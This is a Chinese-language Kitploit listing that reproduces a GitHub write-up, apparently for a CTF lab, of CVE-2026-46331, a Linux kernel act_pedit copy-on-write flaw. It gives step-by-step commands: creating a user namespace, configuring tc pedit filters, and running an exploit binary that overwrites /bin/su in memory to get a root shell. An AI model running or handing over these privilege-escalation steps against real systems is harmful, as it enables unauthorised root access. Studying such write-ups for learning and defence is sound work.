Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-46331-pedit-cow — 关于pedit COW漏洞(CVE-2026-46331)的详解与利用步骤 | Kitploit
工具/GitHubGitHub/marwahhadi/cve-2026-46331-pedit-cow
权限提升漏洞利用CTF学习与教育二进制利用
GitHubmarwahhadi/cve-2026-46331-pedit-cow

CVE-2026-46331-pedit-cow

关于pedit COW漏洞(CVE-2026-46331)的详解与利用步骤

查看仓库
52个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-46331-pedit-cow

针对 pedit COW 漏洞(CVE-2026-46331)的撰写和利用步骤。

概述

该挑战演示了 pedit COW,这是 Linux 内核流量控制子系统中数据包编辑动作(act_pedit)的一个缺陷。该漏洞允许非特权用户覆盖内存中 setuid-root 二进制的副本,从而在不触及磁盘文件的情况下有效获取 root shell。

利用步骤

1. 初始设置

环境以非特权用户(karen)身份启动。

id
cd ~/packet_edit_meme
make packet_edit_meme

2. 权限提升(命名空间创建)

配置流量控制通常需要 CAP_NET_ADMIN 特权,普通用户不具备此权限。我利用非特权用户命名空间来获得该能力。

unshare -r -n

3. 配置流量控制动作

在命名空间内部,我配置了 clsact qdisc,并应用了一个过滤器以触发 pedit 动作。

如有需要,先清理现有配置

tc qdisc del dev lo clsact

设置 qdisc 和过滤器

tc qdisc add dev lo clsact
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64

4. 执行漏洞利用

设置环境后,我退出了 root shell,并以非特权用户身份执行漏洞利用程序。

exit
./packet_edit_meme

5. 最终结果

该漏洞利用成功覆盖了 /bin/su 的条目,提供了一个交互式 root shell。

# cat /root/flag.txt

THM{YOUR_FLAG_HERE}

下载工具